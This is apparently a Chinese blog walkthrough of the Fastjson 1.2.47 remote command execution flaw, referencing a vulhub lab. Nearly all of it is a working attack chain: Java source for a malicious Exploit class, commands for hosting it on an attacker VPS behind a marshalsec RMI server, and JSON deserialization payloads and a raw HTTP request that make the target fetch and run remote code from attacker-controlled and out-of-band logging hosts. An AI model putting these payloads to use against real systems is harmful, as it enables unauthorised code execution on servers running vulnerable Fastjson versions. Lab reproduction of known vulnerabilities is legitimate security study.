Fastjson 1.2.47 远程命令执行漏洞

#referer https://vulhub.org/#/environments/fastjson/1.2.47-rce/

1、生成编译攻击脚本Exploit.class #大坑,z centos上编译java,受java版本影响,目前在linux下 java version “1.8.0_141” 版本编译成功

将下面代码保存为:Exploit.java
然后执行:javac Exploit.java,生成class文件

import java.lang.Runtime;
import java.lang.Process;
public class Exploit {

    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec("ping fastjson.t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org");
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }

}

2、在vps上执行,启动一个rmi服务**
Exploit.class 放到vps根目录 ,使得 http://vps.0535code.com/Exploit.class 可以直接访问
#然后下载 marshalsec-0.0.3-SNAPSHOT-all.jar 在vps执行
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://vps.0535code.com/#Exploit”
#rmi服务默认只开放1099 端口

3、构造 payload:
在头中增加 content-type:application/json ,去掉 其他冗余字段 Accept:*****

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://vps.0535code.com:1099/Exploit",
        "autoCommit":true
    }
}

或者

POST  / HTTP/1.1
Host: 192.168.8.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept-Encoding: gzip, deflate
content-type:application/json
Content-Length: 195

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://111.38s7vp.ceye.io/TouchFile","autoCommit":true}}

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.